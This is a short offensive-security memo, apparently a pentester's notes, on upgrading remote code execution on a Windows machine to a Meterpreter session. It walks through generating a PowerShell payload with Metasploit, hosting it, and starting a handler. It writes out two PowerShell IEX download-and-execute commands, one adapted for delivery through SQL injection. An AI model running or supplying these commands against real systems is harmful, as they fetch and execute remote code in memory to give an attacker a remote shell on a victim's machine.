RCE to Meterpreter session via Powershell
================================================================================

If in a position where a RCE was obtained on a Windows machine and in need to
upgrade to a better shell, than this memo can help.

tl;dr; The ruby script generates a powershell script which will be downloaded
and executed in target box's memory via the use of IEX Powershell command.

It is recommended to run the ruby script in Kali as it uses Metasploit.
Originally this script was created to generate this same technique and payload
for the RubberDucky. The same script it is now recycled for the same goal but
delivered differently.

Steps:
- run the ruby script in kali and follow the steps
- open the created powershell script and copy the line from "powershell -nop" onwards
- save the copied text in a new powershell script (save it as .ps1)
- make the new ps1 script available with SimpleHTTPServer or the like
- in Kali, start a exploit/multi/handler and use the same config defined in step 1
- on the target machine execute the following powershell command(define the IP and port)


powershell IEX (New-Object Net.WebClient).DownloadString('http://server:port/pwned.ps1');


The IEX command is a bit picky and it really likes the single quotes. In the past I
had to inject the command via a SQL injection and I couldn't escape or reuse the
sigle quote. The hack that worked for me is the following command:



powershell Set-Variable -Name "urlz" -Value “http://server:port/pwned.ps1" ;IEX (New-Object Net.WebClient).DownloadString($urlz);



Good luck and Have Fun!!!